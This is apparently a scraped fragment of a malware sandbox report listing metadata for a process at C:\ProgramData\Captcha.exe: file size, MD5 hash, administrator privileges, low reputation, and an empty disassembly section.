                                                                                                                              Path:C:\ProgramData\Captcha.exe
                                                                                                                              Wow64 process (32bit):
                                                                                                                              Commandline:none
                                                                                                                              Imagebase:
                                                                                                                              File size:2'142'592 bytes
                                                                                                                              MD5 hash:05B7F29D1BAEAC0A7513D094BFC12A92
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Disassembly

                                                                                                                              Reset < >